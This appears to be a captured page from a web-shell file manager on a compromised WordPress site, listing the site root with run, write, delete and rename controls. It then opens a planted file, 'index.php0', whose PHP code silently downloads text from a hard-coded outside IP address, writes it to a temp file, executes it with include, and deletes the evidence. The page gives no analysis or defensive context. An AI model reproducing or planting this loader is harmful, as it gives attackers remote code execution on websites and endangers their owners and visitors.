at path:
ROOT
/
index.php0
run:
R
W
Run
3e7c59
DIR
2026-08-03 09:03:11
R
W
Run
wp-admin
DIR
2026-08-03 09:03:10
R
W
Run
wp-content
DIR
2026-08-03 09:03:11
R
W
Run
wp-includes
DIR
2026-08-03 09:03:10
R
W
Run
.htaccess
1.13 KB
2025-04-28 09:03:11
R
W
Run
index.php0
416 By
2024-05-22 09:03:10
R
W
Run
Delete
Rename
robots.txt
355 By
2023-12-12 09:03:11
R
W
Run
testsend.php
316 By
2026-08-12 09:05:25
R
W
Run
Delete
Rename
error_log
up
📄
index.php0
Save
<?php $f = @tempnam(@sys_get_temp_dir(),""); $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://63.141.224.2/z60704_8/stat/index.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } @file_put_contents($f, $result); @include $f; @unlink($f);